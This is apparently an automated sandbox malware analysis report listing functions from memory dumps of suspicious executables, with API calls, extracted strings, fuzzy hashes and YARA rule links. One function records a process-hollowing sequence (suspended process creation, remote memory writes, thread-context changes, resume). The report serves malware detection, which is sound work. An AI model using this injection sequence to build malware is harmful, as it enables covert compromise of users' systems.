Snapshot File: hcaresult_7_2_2610000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3f7ad601e1a86f380755614fa62f5051d28cc12fc4071908c8b9058c9a8a2e89
Instruction ID: 77da9551faab82dbcf67015f583f56126fa121e42faa92371018c1a5e094c51f
Opcode Fuzzy Hash: 3f7ad601e1a86f380755614fa62f5051d28cc12fc4071908c8b9058c9a8a2e89
Instruction Fuzzy Hash: 7F1164B69002088FCB20DFAAC844BDEFBF5EB88320F248819D459A7210CB35A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0254D01C Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2160807467.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_254d000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875ad4b8a9c0469ebe3545fa3ffdbc62a6ec6ec6dd9387cfb55f7df680ce895c
Instruction ID: d97094aedfed9b836fc68a9e488efacce11db09db43c113d6b451d412ac4ad92
Opcode Fuzzy Hash: 875ad4b8a9c0469ebe3545fa3ffdbc62a6ec6ec6dd9387cfb55f7df680ce895c
Instruction Fuzzy Hash: 23212271105244DFDB14DF14DAC4B36FFB5FB84318F20C569E9090B246D73AE44ACAA6

Uniqueness

Uniqueness Score: -1.00%

Function 0254D006 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2160807467.000000000254D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0254D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_254d000_tskTMObYcvz1CtypLgyOWpYi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0edf2524e5de4c9f6b33b7afc02b0e73043179ce01b35da432e3d223e9dcdf08
Instruction ID: fa047f39ad7025bbb16f13d49a5d3287aeb4a6fd4447ab9145e71bf270fa15f6
Opcode Fuzzy Hash: 0edf2524e5de4c9f6b33b7afc02b0e73043179ce01b35da432e3d223e9dcdf08
Instruction Fuzzy Hash: AC2180755093C08FCB12CF24D994B16BF71FB86214F2881DAD8498B657C33AD41ACB62

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: fq9BbqPKEgDrDHrc1Aru5zuA.exePID: 7632, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	6

Executed Functions

Function 02A18D35 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02A18EA4
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A18EB7
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02A18ED5
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A18EF9
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02A18F24
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02A18F7C
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02A18FC7
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02A19005
Wow64SetThreadContext.KERNEL32(?,?), ref: 02A19041
ResumeThread.KERNELBASE(?), ref: 02A19050

Strings

aryA, xrefs: 02A18D7B
Load, xrefs: 02A18D73
ress, xrefs: 02A18DBF
GetP, xrefs: 02A18DB7

Memory Dump Source

Source File: 00000008.00000002.2161053225.0000000002A18000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a18000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 58fcc522da2886d3b0059260ae223cf6c96bb84c015ded3ab7fe489070214155
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 84B1D37664068AAFDB60CF68CC80BDA77A5FF88714F158125EA08AB341D774FA418B94

Uniqueness

Uniqueness Score: -1.00%

Function 028C5040 Relevance: 1.6, APIs: 1, Instructions: 72
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 028C50E4

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 75b23c35acf89a7f0c4e530c11e172920af9c0816538ba7a25c3cf7037f93aa8
Instruction ID: 08a47c5fa26e27c7e16366db6e7f33e61cdf48ff2855aca3101a1c04e9ff9925
Opcode Fuzzy Hash: 75b23c35acf89a7f0c4e530c11e172920af9c0816538ba7a25c3cf7037f93aa8
Instruction Fuzzy Hash: 963147B59003099FCF10CFA9D884ADEBBF5FB48310F208429E859A7210C775A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 028C5048 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 028C50E4

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b26275feac07e31444c7751bfb89f1a6e38ed32fc652be2919da89dbab8ad9e4
Instruction ID: 2855ed1b434454f88d4ece57f6b9ea956604920cabcc20a328ab2516ecab4b83
Opcode Fuzzy Hash: b26275feac07e31444c7751bfb89f1a6e38ed32fc652be2919da89dbab8ad9e4
Instruction Fuzzy Hash: 682137B59003099FCF10CFA9D984BDEBBF5FF48314F208429E959A7210C779A954CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 028C4EA8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 028C4F30

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7776e0467d74c0c85a495aab5d4acfe43f177885bf54b93646ab57a9a81dc664
Instruction ID: bfb708364c8563ee650fe7a09f048bad461f322d7a2b5dc6e6340b484d08351a
Opcode Fuzzy Hash: 7776e0467d74c0c85a495aab5d4acfe43f177885bf54b93646ab57a9a81dc664
Instruction Fuzzy Hash: 782136B58002499FCB10CFAAC884AEEFBF1FF88320F14842EE559A7250C7389955CF65

Uniqueness

Uniqueness Score: -1.00%

Function 028C4EB0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 028C4F30

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4b358a8d4a4b501c52fada5815f60a24157d30ecca1c3604ab1ade0239ec1d09
Instruction ID: 45e88ac71345319b099902109689ca0e8adff4c7dc894bd3b7d3b2ad9098c6c2
Opcode Fuzzy Hash: 4b358a8d4a4b501c52fada5815f60a24157d30ecca1c3604ab1ade0239ec1d09
Instruction Fuzzy Hash: 2F2128B59002599FCB10DFAAC884AEEFBF5FF48320F10842AE558A7250C7789944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 028C4F88 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 028C4FF5

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c111bca4ca5b3115ed569d058582a984445a199997d588c588e4eeb0458fd38d
Instruction ID: 632c597b2b6d4d2a2f3de1d35061b66651bb6a1b1c04883b5d4d563f77eff036
Opcode Fuzzy Hash: c111bca4ca5b3115ed569d058582a984445a199997d588c588e4eeb0458fd38d
Instruction Fuzzy Hash: C11137B5D002498BDB20DFA9C4447DEFBF5AB88324F24841AD559A7250CB78A544CB94

Uniqueness

Uniqueness Score: -1.00%

Function 028C4F90 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 028C4FF5

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4329a1033c7b008f963540a77fc4df13b6d270a22850a6facbb6a8add2fe4c51
Instruction ID: 8e0cfd67e5ee0bb281b0f87f6faf52b08fde1f3fc91626cd65fd44a04059e593
Opcode Fuzzy Hash: 4329a1033c7b008f963540a77fc4df13b6d270a22850a6facbb6a8add2fe4c51
Instruction Fuzzy Hash: EF1158B59002488FCB20DFAAC444BDFFFF4EB88324F20842AD459A7250CB79A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 028C3A70 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 028C3AD7

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: e70744bf4ea2b7df091b51a4263ed95d54311977d9327eb65a9169e1673b3939
Instruction ID: b9ee504d9560da5d41e7ccf72a8928784bdd087410bd976f0c3df954c3c5401d
Opcode Fuzzy Hash: e70744bf4ea2b7df091b51a4263ed95d54311977d9327eb65a9169e1673b3939
Instruction Fuzzy Hash: 511136B49042498FCB20DFAAC4857EEBFF0EF88324F20846DC099A7240C775A555CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 028C3A78 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 028C3AD7

Memory Dump Source

Source File: 00000008.00000002.2156423638.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_28c0000_fq9BbqPKEgDrDHrc1Aru5zuA.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 2301dcd9026ee4bc6dc1b8cd1949da84577c519170cb4a7120966f3a5b53a3b6
Instruction ID: 2dbe943ce24dd609e98c4c797641b5f69a68a1af15b1d4ebd4a051b619a7b694
Opcode Fuzzy Hash: 2301dcd9026ee4bc6dc1b8cd1949da84577c519170cb4a7120966f3a5b53a3b6
Instruction Fuzzy Hash: 461123B59042498FCB20DFAAC4457EFBFF4EB88324F20846EC559A7240CB79A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: g1nHVnlr2tXTEWQsRz_M547D.exePID: 7640, Parent PID: 6984COMMON

Executed Functions

Function 05E60EB3 Relevance: 29.6, Strings: 23, Instructions: 800COMMON

Download Yara Rule

Strings

Gvq, xrefs: 05E61923
LOOK, xrefs: 05E60F6A
p<^q, xrefs: 05E6118D
HERE, xrefs: 05E60F6F
Gvq, xrefs: 05E616D2
HERE, xrefs: 05E617E9
LOOK, xrefs: 05E6158D
LOOK, xrefs: 05E619EB
p<^q, xrefs: 05E61177
LOOK, xrefs: 05E612E7
HERE, xrefs: 05E61086
LOOK, xrefs: 05E617E4
HERE, xrefs: 05E61AA4
Gvq, xrefs: 05E61243
LOOK, xrefs: 05E61A9F
HERE, xrefs: 05E61592
HERE, xrefs: 05E612EC
HERE, xrefs: 05E619F0
Gvq, xrefs: 05E614CA
p<^q, xrefs: 05E61142
Gvq, xrefs: 05E61CCD
p<^q, xrefs: 05E6112C
LOOK, xrefs: 05E61081

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
API String ID: 0-3728642687
Opcode ID: bae34aebe2e6a58abd9342274a0426451ca2a4607075d1f4221f248a5f25c075
Instruction ID: b3697e45d325e1604fb3b82fe1b82519c082c85c5a103195cd52e7e246519e5f
Opcode Fuzzy Hash: bae34aebe2e6a58abd9342274a0426451ca2a4607075d1f4221f248a5f25c075
Instruction Fuzzy Hash: 2A82B274E402298FDB65DF68C988BD9B7B2BB48340F1481E9D44DAB365DB30AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01B4A578 Relevance: 7.1, Strings: 5, Instructions: 825COMMON

Download Yara Rule

Strings

,bq, xrefs: 01B4ACB7
(o^q, xrefs: 01B4AF29
(o^q, xrefs: 01B4AF33
Hbq, xrefs: 01B4AFA0
,bq, xrefs: 01B4ACC7

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: 5d9cbbd8f871749c1b224262d6c508f3573b915c4db7d669097fc2802f8a2d68
Instruction ID: db9db38c8e4702dafec4e48dc38b668636add2f814c8d8a24a35d42d6cefbace
Opcode Fuzzy Hash: 5d9cbbd8f871749c1b224262d6c508f3573b915c4db7d669097fc2802f8a2d68
Instruction Fuzzy Hash: 34627E75A401159FDB18DF78C484AAEBBB6FF88710B15C5A9E906DB3A1CB30EC41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01B40EAF Relevance: .7, Instructions: 735COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beac625b4c99800477491328a4ae557d315053acdc685f2c02454de69986a2a1
Instruction ID: 0527272b8a603dbec7702d7570edae400efb6f05b7e61f4cb42ef1a173ccb577
Opcode Fuzzy Hash: beac625b4c99800477491328a4ae557d315053acdc685f2c02454de69986a2a1
Instruction Fuzzy Hash: 1A92EB74A01219CFDB25EF28D944AADBBB2FB48304F1085D9E80D67364DB366E89DF41

Uniqueness

Uniqueness Score: -1.00%

Function 05E626F8 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e67b88da3e7a3965dc5d56a090980943849f01b1a18bd7327cc1b0a2cc00d881
Instruction ID: 170781bfdd3191252b0e3ec55159af5ea537fd44a6453e34ac3602a02a97b092
Opcode Fuzzy Hash: e67b88da3e7a3965dc5d56a090980943849f01b1a18bd7327cc1b0a2cc00d881
Instruction Fuzzy Hash: F132B074E012298FDB64DFA9C890BEDBBB2BF89304F1081AAD549A7354DB305E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05E626DC Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2cd608606f9502ab9178c92b51706050437e0560db5ba4dc107217894f34263
Instruction ID: 64d9753f470f1f0e6dfc718cd2abde5a209c625f5adb8a6368434b6f4661d7a1
Opcode Fuzzy Hash: a2cd608606f9502ab9178c92b51706050437e0560db5ba4dc107217894f34263
Instruction Fuzzy Hash: F591C374E012289FDB64DF69C840BDDBBB2BF89300F1481AAD54DAB254EB345A86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01B48C78 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80152cea300f8a39e552ced4e549c5b2ca9e3348458e8629e182555b67442dfb
Instruction ID: 6657091105f22a44438f3d4ccd4832082c4b448ee0ba43fd917b19eae5850e28
Opcode Fuzzy Hash: 80152cea300f8a39e552ced4e549c5b2ca9e3348458e8629e182555b67442dfb
Instruction Fuzzy Hash: 2E51D574E01218CFDB18CFAAD944B9EBBF2AF89300F14D1A9D909AB355DB305941CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01B4F600 Relevance: 4.2, Strings: 3, Instructions: 465COMMON

Download Yara Rule

Strings

$^q, xrefs: 01B4F700
$^q, xrefs: 01B4F70C
Hbq, xrefs: 01B4F7AC

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 609fa2025eaf5f88c52c85ddd0401f0f4e5cfd017dd9b6d303f3053be9838c0e
Instruction ID: 55c63f3793b20c15a4fc8e4b78dc2aa4affd205a7dd1448278a8729ecb3dc244
Opcode Fuzzy Hash: 609fa2025eaf5f88c52c85ddd0401f0f4e5cfd017dd9b6d303f3053be9838c0e
Instruction Fuzzy Hash: B9F14934B002199FDB199F78D4546BE7BB6EB89600F1484A9E502EB3A1DF34DC42DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01B4EB08 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

d8cq, xrefs: 01B4EB60
Hbq, xrefs: 01B4ED7E

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: Hbq$d8cq
API String ID: 0-70480990
Opcode ID: 97a745f338827d12e6090eb99d702027407811e072df6b19619da38913cc9225
Instruction ID: f36b969415f0d0df23cb906ad4c7833c366af4842904a76c77685819a3cc04fe
Opcode Fuzzy Hash: 97a745f338827d12e6090eb99d702027407811e072df6b19619da38913cc9225
Instruction Fuzzy Hash: 89126D34201304DFD70AAB6CE554B693B77FB9A301F1085A8E805577E5CB39EC89EB26

Uniqueness

Uniqueness Score: -1.00%

Function 05E62278 Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

PO^q, xrefs: 05E6232C
TJcq, xrefs: 05E62356

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: PO^q$TJcq
API String ID: 0-3011750398
Opcode ID: 62889affd6ebfd0293d947e2374444ea01c50f946d0dbd0d733b2b820445b9b4
Instruction ID: bffc6c8f2edd1e600e2e7339e9ecc63e1e13723c553f3e1b1c0c4672dc572857
Opcode Fuzzy Hash: 62889affd6ebfd0293d947e2374444ea01c50f946d0dbd0d733b2b820445b9b4
Instruction Fuzzy Hash: 6B411671B44205AFD704DF68E880EAE7BF6EF84350F118869E646DB391DF30AD058B95

Uniqueness

Uniqueness Score: -1.00%

Function 05E60000 Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

TJcq, xrefs: 05E6008F
Te^q, xrefs: 05E60077

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 66755fb21a8dff501fd35372a19537631a5fc81d72eb6d73eb296eedce02fd57
Instruction ID: 2d08d13600a9dc7b93089dfa774da3bebc8f08a33da4b813656e961f822bcf77
Opcode Fuzzy Hash: 66755fb21a8dff501fd35372a19537631a5fc81d72eb6d73eb296eedce02fd57
Instruction Fuzzy Hash: 87312361B093944FD7069B7488686BE7FB5EF86200F09089AD845DB3D3DA285D09CBF3

Uniqueness

Uniqueness Score: -1.00%

Function 05E6010C Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

TJcq, xrefs: 05E6016D
Te^q, xrefs: 05E60156

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 109bb7500a1c7adbbbb8110f96d3e50514fae22f87c86cb50e7343fff7770d7b
Instruction ID: 55d472a788c7dd0755a353083d3a5c31050f72b54e97bf0b3eacde0401274727
Opcode Fuzzy Hash: 109bb7500a1c7adbbbb8110f96d3e50514fae22f87c86cb50e7343fff7770d7b
Instruction Fuzzy Hash: 56212730B042455FDB16ABA888546BF7FB2EF85210F14049AD941DB391CE356D09D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 05E60128 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

TJcq, xrefs: 05E6016D
Te^q, xrefs: 05E60156

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 897a3467890d90df1f32331b8d932ecd3111d4088cd5b138cd5e6d8b2962cc55
Instruction ID: a04f679be3d6ceeaecad3e35de7b8f5528cebab9bc7170de18e0f2c6539a0ffb
Opcode Fuzzy Hash: 897a3467890d90df1f32331b8d932ecd3111d4088cd5b138cd5e6d8b2962cc55
Instruction Fuzzy Hash: 1411D531B001195BDB14ABA8C4587BFBBB2FF85310F504469D506AB390CE31AD05D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 05E60048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

TJcq, xrefs: 05E6008F
Te^q, xrefs: 05E60077

Memory Dump Source

Source File: 00000009.00000002.2248935817.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e60000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 13e8f77f19b7dab27207a34b81c95f132bf9c84f27b03efac5c713605d94f211
Instruction ID: 5195bb0303c273529a39c8ac335e43852059e46a166073b8384a8f4845ccc73a
Opcode Fuzzy Hash: 13e8f77f19b7dab27207a34b81c95f132bf9c84f27b03efac5c713605d94f211
Instruction Fuzzy Hash: C611D330B002155FDB28EBA994587BFBAE6FFC9210F50046CD506AB380DE21AD05CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 01B42041 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

8bq, xrefs: 01B42117

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: fb36fdcbd6f0bdcb68cb45c60799d0750df70b16a1d38ff8eab863713f696024
Instruction ID: 5da87f35e28efd29c7bf8302ea726544605a4b7d556dacf93f0a447a8259219f
Opcode Fuzzy Hash: fb36fdcbd6f0bdcb68cb45c60799d0750df70b16a1d38ff8eab863713f696024
Instruction Fuzzy Hash: 48410178D05208DFDB04CFA9E884AEEBBF6FB89300F0081AAE505A3350DB345945EF50

Uniqueness

Uniqueness Score: -1.00%

Function 01B409D9 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

0u, xrefs: 01B40A9A

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: 0u
API String ID: 0-3203441087
Opcode ID: 28c6c5c4c539ac33275ba148220d8b14ef12eef22f561845ac8160c09883f1e3
Instruction ID: 64f14ca7d690e6180340a5dbdcf862d7b41a213a68e3f3ea64f657c0f809902c
Opcode Fuzzy Hash: 28c6c5c4c539ac33275ba148220d8b14ef12eef22f561845ac8160c09883f1e3
Instruction Fuzzy Hash: E9216674D04208CFDB08DFA4D4446EEBBB6FB89301F1496A9E60AB7251E7385A45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 01B49740 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Hbq, xrefs: 01B497D4

Memory Dump Source

Source File: 00000009.00000002.2029140204.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1b40000_g1nHVnlr2tXTEWQsRz_M547D.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: d60c2266404fb64534001ef464e9d933646a79a25b64d68a54bbdfd1b3c8028e
Instruction ID: becc5aed05bcc031d9664bcde148c742d5bbb06f244265fc9a8cca2c59662940
Opcode Fuzzy Hash: d60c2266404fb64534001ef464e9d933646a79a25b64d68a54bbdfd1b3c8028e
Instruction Fuzzy Hash: 5521A434A04144AFEB449F78CC45BAE7FBAFB85700F20C4A5E505DB280CF35AA058B91

Uniqueness

Uniqueness Score: -1.00%

Function 01B409E8 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

0u, xrefs: 01B40A9A

Memory Dump Source

